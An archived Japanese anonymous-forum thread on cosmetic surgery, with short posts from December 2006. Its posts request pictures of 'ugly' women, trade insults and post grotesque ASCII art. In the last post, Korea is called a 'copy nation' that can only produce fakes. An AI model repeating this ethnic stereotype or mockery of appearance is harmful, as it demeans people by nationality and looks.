110 :名無しさん@Before→After:2006/12/07(木) 18:29:34 ID:lVytG4lT
>>109
ブスの画像くれ!
http://ex17.2ch.net/test/read.cgi/news4vip/1165413665/

111 :名無しさん@Before→After:2006/12/07(木) 18:32:47 ID:eQx9CF4N
       ;(●))(●)(●)(●)llll)(●)(●)(●)((●)(●)(●)(●)(●))(●)(●)(●)(●))(●)
       (●)(●)(●)(●))(●)(●)(●)(●))(●)(●)(●)(●)(●)(●))(●)(●)(●)(●))(●)
 \__ (●)(●)●)●)(●))(●)(●)(●)(●)(●))(●)(●)(●)(●)(●))(●)(●)(●)(●))(●)__/
   __(●)(●)((●)((●))(●)(●)(●)(●)(●))(●)(●)(●)(●))(●)(●)(●)(●)●)(●)(●)__
 /  (●)(●)(●)(●)(●))(●)(●)(●))(●)(●)(●)(●)(●)(●)(●)(●))(●)(●)(●)(●(●)   \
   __(●)(●)((●)((●))(●)(●)(●)(●)(●))(●)(●)(●)(●))(●)(●)(●)(●)●)(●)(●)__
 /  (●)(●)(●)(●)(●))(●)(●)(●))(●)(●)(●)(●)(●)(●)(●)(●))(●)(●)(●)(●(●)   \
   __(●)(●)((●)((●))(●)(●)(●)(●)( 汚物 )(●)(●)(●))(●)(●)(●)(●)●)(●)(●)__
 /  (●)(●)(●)(●)(●))(●)(●)(●))(●)(●)(●)(●)(●)(●)(●)(●))(●)(●)(●)(●(●)   \
   __(●)(●)((●)((●))(●)(●)(●)(●)(●))(●)(●)(●)(●))(●)(●)(●)(●)●)(●)(●)__
 /  (●)(●)(●)(●)(●))(●)(●)(●))(●)(●)(●)(●)(●)(●)(●)(●))(●)(●)(●)(●(●)   \
   /(l●)(●)(●)(●)))(●)(●)(●)(●)(●)(●)(●l(l●)(●)(●)(●)))(●)(●)(●)(●)(●)\
   | .(l;●)(●)(●))(●))(●)(●)(●)(●)(●)(●)(●)(l●)(●)(●)(●)))(●)(●)(●)(●)   |
   |  .(0●)(●)(●)(●))(●)(●)(●)(●)(●))(●)O)(l●)(●)(●)(●)))(●)(●)(●)(●)   |  
  ,;;    (:●)●)(●)(●)(●)(●)(●)(●))(●))(●;)(l●)(●)(●)(●)))(●)(●)(●)(●)
       (о●)(●))(●)(●))(●)(●)(●)(●)●0) (l●)(●)(●)(●)))(●)(●)(●)(●)
         ( ;●ξ●:)( ;●ξ●:( ;●ξ●:( ;)(l●)(●)(●)(●)))(●)(●)(●)(●)


112 :名無しさん@Before→After:2006/12/07(木) 20:14:31 ID:JiGNZJgN
http://019.gamushara.net/bbs/tv/html/25013.html
これはシドイ・・・

113 :名無しさん@Before→After:2006/12/07(木) 22:40:34 ID:GIjTomcm
羨ましいからって妬むなカスどもwww

114 :名無しさん@Before→After:2006/12/07(木) 22:43:38 ID:TYHWzrrt
http://chat.atura.jp/servlet/hmc/9499
残念ながら整形女は急増中だ

115 :名無しさん@Before→After:2006/12/07(木) 23:38:31 ID:+KSx9DSZ
上げ

116 :名無しさん@Before→After:2006/12/08(金) 00:03:41 ID:QzL5lj8L
こんなとこで批判してるお前らの方がキモイんだよ!!

117 :名無しさん@Before→After:2006/12/08(金) 00:53:55 ID:J4AZHSWd
整形が一番キモい

118 :名無しさん@Before→After:2006/12/09(土) 01:42:05 ID:+zl51bBH
一番は間違いなくお前↑

119 :名無しさん@Before→After:2006/12/22(金) 01:26:23 ID:p7C/M/vW
整形ってその国の文化と比例していると思います。たとえば韓国、コピー大国でしょう。
所詮にせものしか作れないんでしょうね。

36 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)